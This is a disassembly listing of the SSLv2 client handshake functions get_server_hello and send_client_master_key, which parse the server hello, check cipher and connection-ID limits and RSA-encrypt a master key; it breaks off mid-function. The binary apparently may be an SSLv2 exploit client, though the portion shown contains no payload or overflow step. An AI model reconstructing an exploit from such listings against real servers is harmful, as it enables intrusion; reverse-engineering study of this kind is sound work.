Referenced from jump at 0804a828 ; 

0804a834 <get_server_hello+0x1c> mov    0x8(%ebp),%eax
0804a837 <get_server_hello+0x1f> cmpl   $0x0,0x78(%eax)
0804a83b <get_server_hello+0x23> je     0804a84d <get_server_hello+0x35>
0804a83d <get_server_hello+0x25> sub    $0xc,%esp

Possible reference to string:
" -> get_server_hello"

0804a840 <get_server_hello+0x28> push   $0x804c739
0804a845 <get_server_hello+0x2d> call   08048d8c <_init+0x1f8>
0804a84a <get_server_hello+0x32> add    $0x10,%esp

Referenced from jump at 0804a83b ; 

0804a84d <get_server_hello+0x35> sub    $0x4,%esp
0804a850 <get_server_hello+0x38> push   $0x4000
0804a855 <get_server_hello+0x3d> lea    0xffffbff8(%ebp),%eax
0804a85b <get_server_hello+0x43> push   %eax
0804a85c <get_server_hello+0x44> pushl  0x8(%ebp)
0804a85f <get_server_hello+0x47> call   0804a2bc <read_ssl_packet>
0804a864 <get_server_hello+0x4c> add    $0x10,%esp
0804a867 <get_server_hello+0x4f> mov    %eax,%eax
0804a869 <get_server_hello+0x51> mov    %eax,0xffffbfec(%ebp)
0804a86f <get_server_hello+0x57> cmpl   $0x0,0xffffbfec(%ebp)
0804a876 <get_server_hello+0x5e> jne    0804a884 <get_server_hello+0x6c>
0804a878 <get_server_hello+0x60> mov    $0x0,%eax
0804a87d <get_server_hello+0x65> jmp    0804ac67 <get_server_hello+0x44f>
0804a882 <get_server_hello+0x6a> mov    %esi,%esi

Referenced from jump at 0804a876 ; 

0804a884 <get_server_hello+0x6c> cmpl   $0xa,0xffffbfec(%ebp)
0804a88b <get_server_hello+0x73> jg     0804a8c0 <get_server_hello+0xa8>
0804a88d <get_server_hello+0x75> mov    0x8(%ebp),%eax
0804a890 <get_server_hello+0x78> movl   $0x2,0x7c(%eax)
0804a897 <get_server_hello+0x7f> sub    $0x4,%esp
0804a89a <get_server_hello+0x82> pushl  0xffffbfec(%ebp)

Possible reference to string:
"get_server_hello: Packet too short (len = %d)"

0804a8a0 <get_server_hello+0x88> push   $0x804c760
0804a8a5 <get_server_hello+0x8d> mov    0x8(%ebp),%eax
0804a8a8 <get_server_hello+0x90> sub    $0xffffff80,%eax
0804a8ab <get_server_hello+0x93> push   %eax
0804a8ac <get_server_hello+0x94> call   08048e6c <_init+0x2d8>
0804a8b1 <get_server_hello+0x99> add    $0x10,%esp
0804a8b4 <get_server_hello+0x9c> mov    $0x0,%eax
0804a8b9 <get_server_hello+0xa1> jmp    0804ac67 <get_server_hello+0x44f>
0804a8be <get_server_hello+0xa6> mov    %esi,%esi

Referenced from jump at 0804a88b ; 

0804a8c0 <get_server_hello+0xa8> lea    0xffffbff8(%ebp),%eax
0804a8c6 <get_server_hello+0xae> mov    %eax,0xffffbff4(%ebp)
0804a8cc <get_server_hello+0xb4> mov    0xffffbff4(%ebp),%edx
0804a8d2 <get_server_hello+0xba> lea    0xffffbff4(%ebp),%eax
0804a8d8 <get_server_hello+0xc0> incl   (%eax)
0804a8da <get_server_hello+0xc2> cmpb   $0x4,(%edx)
0804a8dd <get_server_hello+0xc5> je     0804a918 <get_server_hello+0x100>
0804a8df <get_server_hello+0xc7> mov    0x8(%ebp),%eax
0804a8e2 <get_server_hello+0xca> movl   $0x2,0x7c(%eax)
0804a8e9 <get_server_hello+0xd1> sub    $0x4,%esp
0804a8ec <get_server_hello+0xd4> mov    0xffffbff4(%ebp),%eax
0804a8f2 <get_server_hello+0xda> dec    %eax
0804a8f3 <get_server_hello+0xdb> movzbl (%eax),%eax
0804a8f6 <get_server_hello+0xde> push   %eax

Possible reference to string:
"get_server_hello: Expected SSL2_MT_SERVER_HELLO, got 0x%02x"

0804a8f7 <get_server_hello+0xdf> push   $0x804c7a0
0804a8fc <get_server_hello+0xe4> mov    0x8(%ebp),%eax
0804a8ff <get_server_hello+0xe7> sub    $0xffffff80,%eax
0804a902 <get_server_hello+0xea> push   %eax
0804a903 <get_server_hello+0xeb> call   08048e6c <_init+0x2d8>
0804a908 <get_server_hello+0xf0> add    $0x10,%esp
0804a90b <get_server_hello+0xf3> mov    $0x0,%eax
0804a910 <get_server_hello+0xf8> jmp    0804ac67 <get_server_hello+0x44f>
0804a915 <get_server_hello+0xfd> lea    0x0(%esi),%esi

Referenced from jump at 0804a8dd ; 

0804a918 <get_server_hello+0x100> mov    0xffffbff4(%ebp),%edx
0804a91e <get_server_hello+0x106> lea    0xffffbff4(%ebp),%eax
0804a924 <get_server_hello+0x10c> incl   (%eax)
0804a926 <get_server_hello+0x10e> cmpb   $0x0,(%edx)
0804a929 <get_server_hello+0x111> je     0804a958 <get_server_hello+0x140>
0804a92b <get_server_hello+0x113> mov    0x8(%ebp),%eax
0804a92e <get_server_hello+0x116> movl   $0x2,0x7c(%eax)
0804a935 <get_server_hello+0x11d> sub    $0x8,%esp

Possible reference to string:
"get_server_hello: SESSION-ID-HIT is not 0"

0804a938 <get_server_hello+0x120> push   $0x804c7e0
0804a93d <get_server_hello+0x125> mov    0x8(%ebp),%eax
0804a940 <get_server_hello+0x128> sub    $0xffffff80,%eax
0804a943 <get_server_hello+0x12b> push   %eax
0804a944 <get_server_hello+0x12c> call   08048e6c <_init+0x2d8>
0804a949 <get_server_hello+0x131> add    $0x10,%esp
0804a94c <get_server_hello+0x134> mov    $0x0,%eax
0804a951 <get_server_hello+0x139> jmp    0804ac67 <get_server_hello+0x44f>
0804a956 <get_server_hello+0x13e> mov    %esi,%esi

Referenced from jump at 0804a929 ; 

0804a958 <get_server_hello+0x140> mov    0xffffbff4(%ebp),%edx
0804a95e <get_server_hello+0x146> lea    0xffffbff4(%ebp),%eax
0804a964 <get_server_hello+0x14c> incl   (%eax)
0804a966 <get_server_hello+0x14e> cmpb   $0x1,(%edx)
0804a969 <get_server_hello+0x151> je     0804a998 <get_server_hello+0x180>
0804a96b <get_server_hello+0x153> mov    0x8(%ebp),%eax
0804a96e <get_server_hello+0x156> movl   $0x2,0x7c(%eax)
0804a975 <get_server_hello+0x15d> sub    $0x8,%esp

Possible reference to string:
"get_server_hello: CERTIFICATE-TYPE is not SSL_CT_X509_CERTIFICATE"

0804a978 <get_server_hello+0x160> push   $0x804c820
0804a97d <get_server_hello+0x165> mov    0x8(%ebp),%eax
0804a980 <get_server_hello+0x168> sub    $0xffffff80,%eax
0804a983 <get_server_hello+0x16b> push   %eax
0804a984 <get_server_hello+0x16c> call   08048e6c <_init+0x2d8>
0804a989 <get_server_hello+0x171> add    $0x10,%esp
0804a98c <get_server_hello+0x174> mov    $0x0,%eax
0804a991 <get_server_hello+0x179> jmp    0804ac67 <get_server_hello+0x44f>
0804a996 <get_server_hello+0x17e> mov    %esi,%esi

Referenced from jump at 0804a969 ; 

0804a998 <get_server_hello+0x180> mov    0xffffbff4(%ebp),%eax
0804a99e <get_server_hello+0x186> movzbl (%eax),%eax
0804a9a1 <get_server_hello+0x189> mov    %eax,%edx
0804a9a3 <get_server_hello+0x18b> shl    $0x8,%edx
0804a9a6 <get_server_hello+0x18e> mov    0xffffbff4(%ebp),%eax
0804a9ac <get_server_hello+0x194> inc    %eax
0804a9ad <get_server_hello+0x195> movzbl (%eax),%eax
0804a9b0 <get_server_hello+0x198> or     %edx,%eax
0804a9b2 <get_server_hello+0x19a> mov    %eax,0xffffbfe8(%ebp)
0804a9b8 <get_server_hello+0x1a0> lea    0xffffbff4(%ebp),%eax
0804a9be <get_server_hello+0x1a6> addl   $0x2,(%eax)
0804a9c1 <get_server_hello+0x1a9> cmpl   $0x2,0xffffbfe8(%ebp)
0804a9c8 <get_server_hello+0x1b0> je     0804a9fc <get_server_hello+0x1e4>
0804a9ca <get_server_hello+0x1b2> mov    0x8(%ebp),%eax
0804a9cd <get_server_hello+0x1b5> movl   $0x2,0x7c(%eax)
0804a9d4 <get_server_hello+0x1bc> sub    $0x4,%esp
0804a9d7 <get_server_hello+0x1bf> pushl  0xffffbfe8(%ebp)

Possible reference to string:
"get_server_hello: Unsupported server version %d"

0804a9dd <get_server_hello+0x1c5> push   $0x804c880
0804a9e2 <get_server_hello+0x1ca> mov    0x8(%ebp),%eax
0804a9e5 <get_server_hello+0x1cd> sub    $0xffffff80,%eax
0804a9e8 <get_server_hello+0x1d0> push   %eax
0804a9e9 <get_server_hello+0x1d1> call   08048e6c <_init+0x2d8>
0804a9ee <get_server_hello+0x1d6> add    $0x10,%esp
0804a9f1 <get_server_hello+0x1d9> mov    $0x0,%eax
0804a9f6 <get_server_hello+0x1de> jmp    0804ac67 <get_server_hello+0x44f>
0804a9fb <get_server_hello+0x1e3> nop    

Referenced from jump at 0804a9c8 ; 

0804a9fc <get_server_hello+0x1e4> mov    0xffffbff4(%ebp),%eax
0804aa02 <get_server_hello+0x1ea> movzbl (%eax),%eax
0804aa05 <get_server_hello+0x1ed> mov    %eax,%edx
0804aa07 <get_server_hello+0x1ef> shl    $0x8,%edx
0804aa0a <get_server_hello+0x1f2> mov    0xffffbff4(%ebp),%eax
0804aa10 <get_server_hello+0x1f8> inc    %eax
0804aa11 <get_server_hello+0x1f9> movzbl (%eax),%eax
0804aa14 <get_server_hello+0x1fc> or     %edx,%eax
0804aa16 <get_server_hello+0x1fe> mov    %eax,0xffffbfe4(%ebp)
0804aa1c <get_server_hello+0x204> lea    0xffffbff4(%ebp),%eax
0804aa22 <get_server_hello+0x20a> addl   $0x2,(%eax)
0804aa25 <get_server_hello+0x20d> mov    0xffffbff4(%ebp),%eax
0804aa2b <get_server_hello+0x213> movzbl (%eax),%eax
0804aa2e <get_server_hello+0x216> mov    %eax,%edx
0804aa30 <get_server_hello+0x218> shl    $0x8,%edx
0804aa33 <get_server_hello+0x21b> mov    0xffffbff4(%ebp),%eax
0804aa39 <get_server_hello+0x221> inc    %eax
0804aa3a <get_server_hello+0x222> movzbl (%eax),%eax
0804aa3d <get_server_hello+0x225> or     %edx,%eax
0804aa3f <get_server_hello+0x227> mov    %eax,0xffffbfe0(%ebp)
0804aa45 <get_server_hello+0x22d> lea    0xffffbff4(%ebp),%eax
0804aa4b <get_server_hello+0x233> addl   $0x2,(%eax)
0804aa4e <get_server_hello+0x236> mov    0xffffbff4(%ebp),%eax
0804aa54 <get_server_hello+0x23c> movzbl (%eax),%eax
0804aa57 <get_server_hello+0x23f> mov    %eax,%edx
0804aa59 <get_server_hello+0x241> shl    $0x8,%edx
0804aa5c <get_server_hello+0x244> mov    0xffffbff4(%ebp),%eax
0804aa62 <get_server_hello+0x24a> inc    %eax
0804aa63 <get_server_hello+0x24b> movzbl (%eax),%eax
0804aa66 <get_server_hello+0x24e> or     %edx,%eax
0804aa68 <get_server_hello+0x250> mov    %eax,0xffffbfdc(%ebp)
0804aa6e <get_server_hello+0x256> lea    0xffffbff4(%ebp),%eax
0804aa74 <get_server_hello+0x25c> addl   $0x2,(%eax)
0804aa77 <get_server_hello+0x25f> mov    0xffffbfe0(%ebp),%eax
0804aa7d <get_server_hello+0x265> add    0xffffbfe4(%ebp),%eax
0804aa83 <get_server_hello+0x26b> add    0xffffbfdc(%ebp),%eax
0804aa89 <get_server_hello+0x271> add    $0xb,%eax
0804aa8c <get_server_hello+0x274> cmp    %eax,0xffffbfec(%ebp)
0804aa92 <get_server_hello+0x27a> je     0804aac0 <get_server_hello+0x2a8>
0804aa94 <get_server_hello+0x27c> mov    0x8(%ebp),%eax
0804aa97 <get_server_hello+0x27f> movl   $0x2,0x7c(%eax)
0804aa9e <get_server_hello+0x286> sub    $0x8,%esp

Possible reference to string:
"get_server_hello: Malformed packet size"

0804aaa1 <get_server_hello+0x289> push   $0x804c8c0
0804aaa6 <get_server_hello+0x28e> mov    0x8(%ebp),%eax
0804aaa9 <get_server_hello+0x291> sub    $0xffffff80,%eax
0804aaac <get_server_hello+0x294> push   %eax
0804aaad <get_server_hello+0x295> call   08048e6c <_init+0x2d8>
0804aab2 <get_server_hello+0x29a> add    $0x10,%esp
0804aab5 <get_server_hello+0x29d> mov    $0x0,%eax
0804aaba <get_server_hello+0x2a2> jmp    0804ac67 <get_server_hello+0x44f>
0804aabf <get_server_hello+0x2a7> nop    

Referenced from jump at 0804aa92 ; 

0804aac0 <get_server_hello+0x2a8> mov    0x8(%ebp),%eax
0804aac3 <get_server_hello+0x2ab> movl   $0x0,0x58(%eax)
0804aaca <get_server_hello+0x2b2> sub    $0x4,%esp
0804aacd <get_server_hello+0x2b5> pushl  0xffffbfe4(%ebp)
0804aad3 <get_server_hello+0x2bb> lea    0xffffbff4(%ebp),%eax
0804aad9 <get_server_hello+0x2c1> push   %eax
0804aada <get_server_hello+0x2c2> push   $0x0
0804aadc <get_server_hello+0x2c4> call   08048e8c <_init+0x2f8>
0804aae1 <get_server_hello+0x2c9> add    $0x10,%esp
0804aae4 <get_server_hello+0x2cc> mov    %eax,%edx
0804aae6 <get_server_hello+0x2ce> mov    0x8(%ebp),%eax
0804aae9 <get_server_hello+0x2d1> mov    %edx,0x58(%eax)
0804aaec <get_server_hello+0x2d4> mov    0x8(%ebp),%eax
0804aaef <get_server_hello+0x2d7> cmpl   $0x0,0x58(%eax)
0804aaf3 <get_server_hello+0x2db> jne    0804ab20 <get_server_hello+0x308>
0804aaf5 <get_server_hello+0x2dd> mov    0x8(%ebp),%eax
0804aaf8 <get_server_hello+0x2e0> movl   $0x2,0x7c(%eax)
0804aaff <get_server_hello+0x2e7> sub    $0x8,%esp

Possible reference to string:
"get_server_hello: Cannot parse x509 certificate"

0804ab02 <get_server_hello+0x2ea> push   $0x804c900
0804ab07 <get_server_hello+0x2ef> mov    0x8(%ebp),%eax
0804ab0a <get_server_hello+0x2f2> sub    $0xffffff80,%eax
0804ab0d <get_server_hello+0x2f5> push   %eax
0804ab0e <get_server_hello+0x2f6> call   08048e6c <_init+0x2d8>
0804ab13 <get_server_hello+0x2fb> add    $0x10,%esp
0804ab16 <get_server_hello+0x2fe> mov    $0x0,%eax
0804ab1b <get_server_hello+0x303> jmp    0804ac67 <get_server_hello+0x44f>

Referenced from jump at 0804aaf3 ; 

0804ab20 <get_server_hello+0x308> mov    0xffffbfe0(%ebp),%edx
0804ab26 <get_server_hello+0x30e> movl   $0x3,0xffffbfd4(%ebp)
0804ab30 <get_server_hello+0x318> mov    %edx,%eax
0804ab32 <get_server_hello+0x31a> cltd   
0804ab33 <get_server_hello+0x31b> idivl  0xffffbfd4(%ebp)
0804ab39 <get_server_hello+0x321> test   %edx,%edx
0804ab3b <get_server_hello+0x323> je     0804ab68 <get_server_hello+0x350>
0804ab3d <get_server_hello+0x325> mov    0x8(%ebp),%eax
0804ab40 <get_server_hello+0x328> movl   $0x2,0x7c(%eax)
0804ab47 <get_server_hello+0x32f> sub    $0x8,%esp

Possible reference to string:
"get_server_hello: CIPHER-SPECS-LENGTH is not a multiple of 3"

0804ab4a <get_server_hello+0x332> push   $0x804c940
0804ab4f <get_server_hello+0x337> mov    0x8(%ebp),%eax
0804ab52 <get_server_hello+0x33a> sub    $0xffffff80,%eax
0804ab55 <get_server_hello+0x33d> push   %eax
0804ab56 <get_server_hello+0x33e> call   08048e6c <_init+0x2d8>
0804ab5b <get_server_hello+0x343> add    $0x10,%esp
0804ab5e <get_server_hello+0x346> mov    $0x0,%eax
0804ab63 <get_server_hello+0x34b> jmp    0804ac67 <get_server_hello+0x44f>

Referenced from jump at 0804ab3b ; 

0804ab68 <get_server_hello+0x350> movl   $0x0,0xffffbfd8(%ebp)
0804ab72 <get_server_hello+0x35a> mov    0xffffbfe0(%ebp),%eax
0804ab78 <get_server_hello+0x360> add    0xffffbff4(%ebp),%eax
0804ab7e <get_server_hello+0x366> mov    %eax,0xffffbff0(%ebp)

Referenced from jump at 0804abcc ; 

0804ab84 <get_server_hello+0x36c> mov    0xffffbff4(%ebp),%eax
0804ab8a <get_server_hello+0x372> cmp    0xffffbff0(%ebp),%eax
0804ab90 <get_server_hello+0x378> jb     0804ab94 <get_server_hello+0x37c>
0804ab92 <get_server_hello+0x37a> jmp    0804abd0 <get_server_hello+0x3b8>

Referenced from jump at 0804ab90 ; 

0804ab94 <get_server_hello+0x37c> mov    0xffffbff4(%ebp),%eax
0804ab9a <get_server_hello+0x382> cmpb   $0x1,(%eax)
0804ab9d <get_server_hello+0x385> jne    0804abc3 <get_server_hello+0x3ab>
0804ab9f <get_server_hello+0x387> mov    0xffffbff4(%ebp),%eax
0804aba5 <get_server_hello+0x38d> inc    %eax
0804aba6 <get_server_hello+0x38e> cmpb   $0x0,(%eax)
0804aba9 <get_server_hello+0x391> jne    0804abc3 <get_server_hello+0x3ab>
0804abab <get_server_hello+0x393> mov    0xffffbff4(%ebp),%eax
0804abb1 <get_server_hello+0x399> add    $0x2,%eax
0804abb4 <get_server_hello+0x39c> cmpb   $0x80,(%eax)
0804abb7 <get_server_hello+0x39f> jne    0804abc3 <get_server_hello+0x3ab>
0804abb9 <get_server_hello+0x3a1> movl   $0x1,0xffffbfd8(%ebp)

Referenced from jump at 0804ab9d ; 0804aba9 ; 0804abb7 ; 

0804abc3 <get_server_hello+0x3ab> lea    0xffffbff4(%ebp),%eax
0804abc9 <get_server_hello+0x3b1> addl   $0x3,(%eax)
0804abcc <get_server_hello+0x3b4> jmp    0804ab84 <get_server_hello+0x36c>
0804abce <get_server_hello+0x3b6> mov    %esi,%esi

Referenced from jump at 0804ab92 ; 

0804abd0 <get_server_hello+0x3b8> cmpl   $0x0,0xffffbfd8(%ebp)
0804abd7 <get_server_hello+0x3bf> jne    0804ac04 <get_server_hello+0x3ec>
0804abd9 <get_server_hello+0x3c1> mov    0x8(%ebp),%eax
0804abdc <get_server_hello+0x3c4> movl   $0x2,0x7c(%eax)
0804abe3 <get_server_hello+0x3cb> sub    $0x8,%esp

Possible reference to string:
"get_server_hello: Remote server does not support 128 bit RC4"

0804abe6 <get_server_hello+0x3ce> push   $0x804c980
0804abeb <get_server_hello+0x3d3> mov    0x8(%ebp),%eax
0804abee <get_server_hello+0x3d6> sub    $0xffffff80,%eax
0804abf1 <get_server_hello+0x3d9> push   %eax
0804abf2 <get_server_hello+0x3da> call   08048e6c <_init+0x2d8>
0804abf7 <get_server_hello+0x3df> add    $0x10,%esp
0804abfa <get_server_hello+0x3e2> mov    $0x0,%eax
0804abff <get_server_hello+0x3e7> jmp    0804ac67 <get_server_hello+0x44f>
0804ac01 <get_server_hello+0x3e9> lea    0x0(%esi),%esi

Referenced from jump at 0804abd7 ; 

0804ac04 <get_server_hello+0x3ec> cmpl   $0x10,0xffffbfdc(%ebp)
0804ac0b <get_server_hello+0x3f3> jle    0804ac38 <get_server_hello+0x420>
0804ac0d <get_server_hello+0x3f5> mov    0x8(%ebp),%eax
0804ac10 <get_server_hello+0x3f8> movl   $0x2,0x7c(%eax)
0804ac17 <get_server_hello+0x3ff> sub    $0x8,%esp

Possible reference to string:
"get_server_hello: CONNECTION-ID-LENGTH is too long"

0804ac1a <get_server_hello+0x402> push   $0x804c9c0
0804ac1f <get_server_hello+0x407> mov    0x8(%ebp),%eax
0804ac22 <get_server_hello+0x40a> sub    $0xffffff80,%eax
0804ac25 <get_server_hello+0x40d> push   %eax
0804ac26 <get_server_hello+0x40e> call   08048e6c <_init+0x2d8>
0804ac2b <get_server_hello+0x413> add    $0x10,%esp
0804ac2e <get_server_hello+0x416> mov    $0x0,%eax
0804ac33 <get_server_hello+0x41b> jmp    0804ac67 <get_server_hello+0x44f>
0804ac35 <get_server_hello+0x41d> lea    0x0(%esi),%esi

Referenced from jump at 0804ac0b ; 

0804ac38 <get_server_hello+0x420> mov    0x8(%ebp),%eax
0804ac3b <get_server_hello+0x423> mov    0xffffbfdc(%ebp),%edx
0804ac41 <get_server_hello+0x429> mov    %edx,0x44(%eax)
0804ac44 <get_server_hello+0x42c> sub    $0x4,%esp
0804ac47 <get_server_hello+0x42f> pushl  0xffffbfdc(%ebp)
0804ac4d <get_server_hello+0x435> pushl  0xffffbff4(%ebp)
0804ac53 <get_server_hello+0x43b> mov    0x8(%ebp),%eax
0804ac56 <get_server_hello+0x43e> add    $0x48,%eax
0804ac59 <get_server_hello+0x441> push   %eax
0804ac5a <get_server_hello+0x442> call   08048d9c <_init+0x208>
0804ac5f <get_server_hello+0x447> add    $0x10,%esp
0804ac62 <get_server_hello+0x44a> mov    $0x1,%eax

Referenced from jump at 0804a82f ; 0804a87d ; 0804a8b9 ; 0804a910 ; 0804a951 ; 0804a991 ; 0804a9f6 ; 0804aaba ; 0804ab1b ; 0804ab63 ; 0804abff ; 0804ac33 ; 

0804ac67 <get_server_hello+0x44f> leave  
0804ac68 <get_server_hello+0x450> ret    
0804ac69 <get_server_hello+0x451> lea    0x0(%esi),%esi

---- Function : send_client_master_key ----

Referenced from call at 08049343 ; 080494b0 ; 

0804ac6c <send_client_master_key> push   %ebp
0804ac6d <send_client_master_key+0x1> mov    %esp,%ebp
0804ac6f <send_client_master_key+0x3> push   %edi
0804ac70 <send_client_master_key+0x4> push   %esi
0804ac71 <send_client_master_key+0x5> push   %ebx
0804ac72 <send_client_master_key+0x6> sub    $0x402c,%esp
0804ac78 <send_client_master_key+0xc> movl   $0x0,0xffffffd0(%ebp)
0804ac7f <send_client_master_key+0x13> lea    0xffffbfc8(%ebp),%edi

Possible reference to string:
"
"

0804ac85 <send_client_master_key+0x19> mov    $0x804c9f3,%esi
0804ac8a <send_client_master_key+0x1e> cld    
0804ac8b <send_client_master_key+0x1f> mov    $0xb,%ecx
0804ac90 <send_client_master_key+0x24> repz movsb %ds:(%esi),%es:(%edi)
0804ac92 <send_client_master_key+0x26> lea    0xffffbfd3(%ebp),%edi
0804ac98 <send_client_master_key+0x2c> cld    
0804ac99 <send_client_master_key+0x2d> mov    $0x3ff5,%ecx
0804ac9e <send_client_master_key+0x32> mov    $0x0,%al
0804aca0 <send_client_master_key+0x34> repz stos %al,%es:(%edi)
0804aca2 <send_client_master_key+0x36> mov    0x8(%ebp),%eax
0804aca5 <send_client_master_key+0x39> cmpl   $0x0,0x7c(%eax)
0804aca9 <send_client_master_key+0x3d> je     0804acb8 <send_client_master_key+0x4c>
0804acab <send_client_master_key+0x3f> mov    $0x0,%eax
0804acb0 <send_client_master_key+0x44> jmp    0804aeca <send_client_master_key+0x25e>
0804acb5 <send_client_master_key+0x49> lea    0x0(%esi),%esi

Referenced from jump at 0804aca9 ; 

0804acb8 <send_client_master_key+0x4c> mov    0x8(%ebp),%eax
0804acbb <send_client_master_key+0x4f> cmpl   $0x0,0x78(%eax)
0804acbf <send_client_master_key+0x53> je     0804acd1 <send_client_master_key+0x65>
0804acc1 <send_client_master_key+0x55> sub    $0xc,%esp

Possible reference to string:
" -> send_client_master_key"

0804acc4 <send_client_master_key+0x58> push   $0x804c9fe
0804acc9 <send_client_master_key+0x5d> call   08048d8c <_init+0x1f8>
0804acce <send_client_master_key+0x62> add    $0x10,%esp

Referenced from jump at 0804acbf ; 

0804acd1 <send_client_master_key+0x65> lea    0xffffbfc8(%ebp),%eax
0804acd7 <send_client_master_key+0x6b> add    $0xa,%eax
0804acda <send_client_master_key+0x6e> mov    %eax,0xffffffd8(%ebp)
0804acdd <send_client_master_key+0x71> movl   $0x0,0xffffffd4(%ebp)

Referenced from jump at 0804ad0e ; 

0804ace4 <send_client_master_key+0x78> cmpl   $0xf,0xffffffd4(%ebp)
0804ace8 <send_client_master_key+0x7c> jle    0804acec <send_client_master_key+0x80>
0804acea <send_client_master_key+0x7e> jmp    0804ad10 <send_client_master_key+0xa4>

Referenced from jump at 0804ace8 ; 

0804acec <send_client_master_key+0x80> call   08048e9c <_init+0x308>
0804acf1 <send_client_master_key+0x85> mov    %eax,%ebx
0804acf3 <send_client_master_key+0x87> mov    0x8(%ebp),%eax
0804acf6 <send_client_master_key+0x8a> mov    0xffffffd4(%ebp),%ecx
0804acf9 <send_client_master_key+0x8d> add    $0x10,%ecx
0804acfc <send_client_master_key+0x90> add    $0x4,%eax
0804acff <send_client_master_key+0x93> mov    %eax,%edx
0804ad01 <send_client_master_key+0x95> mov    %ebx,%eax
0804ad03 <send_client_master_key+0x97> sar    $0x18,%eax
0804ad06 <send_client_master_key+0x9a> mov    %al,(%ecx,%edx,1)
0804ad09 <send_client_master_key+0x9d> lea    0xffffffd4(%ebp),%eax
0804ad0c <send_client_master_key+0xa0> incl   (%eax)
0804ad0e <send_client_master_key+0xa2> jmp    0804ace4 <send_client_master_key+0x78>

Referenced from jump at 0804acea ; 

0804ad10 <send_client_master_key+0xa4> sub    $0xc,%esp
0804ad13 <send_client_master_key+0xa7> mov    0x8(%ebp),%eax
0804ad16 <send_client_master_key+0xaa> pushl  0x58(%eax)
0804ad19 <send_client_master_key+0xad> call   08048c5c <_init+0xc8>
0804ad1e <send_client_master_key+0xb2> add    $0x10,%esp
0804ad21 <send_client_master_key+0xb5> mov    %eax,%eax
0804ad23 <send_client_master_key+0xb7> mov    %eax,0xffffffd0(%ebp)
0804ad26 <send_client_master_key+0xba> cmpl   $0x0,0xffffffd0(%ebp)
0804ad2a <send_client_master_key+0xbe> jne    0804ad58 <send_client_master_key+0xec>
0804ad2c <send_client_master_key+0xc0> mov    0x8(%ebp),%eax
0804ad2f <send_client_master_key+0xc3> movl   $0x2,0x7c(%eax)
0804ad36 <send_client_master_key+0xca> sub    $0x8,%esp

Possible reference to string:
"send_client_master_key: No public key in the server certificate"

0804ad39 <send_client_master_key+0xcd> push   $0x804ca20
0804ad3e <send_client_master_key+0xd2> mov    0x8(%ebp),%eax
0804ad41 <send_client_master_key+0xd5> sub    $0xffffff80,%eax
0804ad44 <send_client_master_key+0xd8> push   %eax
0804ad45 <send_client_master_key+0xd9> call   08048e6c <_init+0x2d8>
0804ad4a <send_client_master_key+0xde> add    $0x10,%esp
0804ad4d <send_client_master_key+0xe1> mov    $0x0,%eax
0804ad52 <send_client_master_key+0xe6> jmp    0804aeca <send_client_master_key+0x25e>
0804ad57 <send_client_master_key+0xeb> nop    

Referenced from jump at 0804ad2a ; 

0804ad58 <send_client_master_key+0xec> mov    0xffffffd0(%ebp),%eax
0804ad5b <send_client_master_key+0xef> cmpl   $0x6,(%eax)
0804ad5e <send_client_master_key+0xf2> je     0804ad8c <send_client_master_key+0x120>
0804ad60 <send_client_master_key+0xf4> mov    0x8(%ebp),%eax
0804ad63 <send_client_master_key+0xf7> movl   $0x2,0x7c(%eax)
0804ad6a <send_client_master_key+0xfe> sub    $0x8,%esp

Possible reference to string:
"send_client_master_key: The public key in the server certificate is not a RSA key"

0804ad6d <send_client_master_key+0x101> push   $0x804ca60
0804ad72 <send_client_master_key+0x106> mov    0x8(%ebp),%eax
0804ad75 <send_client_master_key+0x109> sub    $0xffffff80,%eax
0804ad78 <send_client_master_key+0x10c> push   %eax
0804ad79 <send_client_master_key+0x10d> call   08048e6c <_init+0x2d8>
0804ad7e <send_client_master_key+0x112> add    $0x10,%esp
0804ad81 <send_client_master_key+0x115> mov    $0x0,%eax
0804ad86 <send_client_master_key+0x11a> jmp    0804aeca <send_client_master_key+0x25e>
0804ad8b <send_client_master_key+0x11f> nop    

Referenced from jump at 0804ad5e ; 

0804ad8c <send_client_master_key+0x120> sub    $0xc,%esp
0804ad8f <send_client_master_key+0x123> push   $0x1
0804ad91 <send_client_master_key+0x125> mov    0xffffffd0(%ebp),%eax
0804ad94 <send_client_master_key+0x128> pushl  0xc(%eax)
0804ad97 <send_client_master_key+0x12b> lea    0xffffbfc8(%ebp),%eax
0804ad9d <send_client_master_key+0x131> add    $0xa,%eax
0804ada0 <send_client_master_key+0x134> push   %eax
0804ada1 <send_client_master_key+0x135> mov    0x8(%ebp),%eax
0804ada4 <send_client_master_key+0x138> add    $0x14,%eax
0804ada7 <send_client_master_key+0x13b> push   %eax
0804ada8 <send_client_master_key+0x13c> push   $0x10
0804adaa <send_client_master_key+0x13e> call   08048d3c <_init+0x1a8>
0804adaf <send_client_master_key+0x143> add    $0x20,%esp
0804adb2 <send_client_master_key+0x146> mov    %eax,%eax
0804adb4 <send_client_master_key+0x148> mov    %eax,0xffffffe4(%ebp)
0804adb7 <send_client_master_key+0x14b> cmpl   $0x0,0xffffffe4(%ebp)
0804adbb <send_client_master_key+0x14f> jg     0804ade8 <send_client_master_key+0x17c>
0804adbd <send_client_master_key+0x151> mov    0x8(%ebp),%eax
0804adc0 <send_client_master_key+0x154> movl   $0x2,0x7c(%eax)
0804adc7 <send_client_master_key+0x15b> sub    $0x8,%esp

Possible reference to string:
"send_client_master_key: RSA encryption failure"

0804adca <send_client_master_key+0x15e> push   $0x804cac0
0804adcf <send_client_master_key+0x163> mov    0x8(%ebp),%eax
0804add2 <send_client_master_key+0x166> sub    $0xffffff80,%eax
0804add5 <send_client_master_key+0x169> push   %eax
0804add6 <send_client_master_key+0x16a> call   08048e6c <_init+0x2d8>
0804addb <send_client_master_key+0x16f> add    $0x10,%esp
0804adde <send_client_master_key+0x172> mov    $0x0,%eax
0804ade3 <send_client_master_key+0x177> jmp    0804aeca <send_client_master_key+0x25e>

Referenced from jump at 0804adbb ; 

0804ade8 <send_client_master_key+0x17c> mov    0xffffffe4(%ebp),%edx
0804adeb <send_client_master_key+0x17f> lea    0xffffffd8(%ebp),%eax
0804adee <send_client_master_key+0x182> add    %edx,(%eax)
0804adf0 <send_client_master_key+0x184> cmpl   $0x0,0xc(%ebp)
0804adf4 <send_client_master_key+0x188> je     0804ae44 <send_client_master_key+0x1d8>
0804adf6 <send_client_master_key+0x18a> movl   $0x0,0xffffffd4(%ebp)
0804adfd <send_client_master_key+0x191> lea    0x0(%esi),%esi

Referenced from jump at 0804ae41 ; 

0804ae00 <send_client_master_key+0x194> cmpl   $0x7,0xffffffd4(%ebp)
0804ae04 <send_client_master_key+0x198> jle    0804ae28 <send_client_master_key+0x1bc>
0804ae06 <send_client_master_key+0x19a> sub    $0x4,%esp
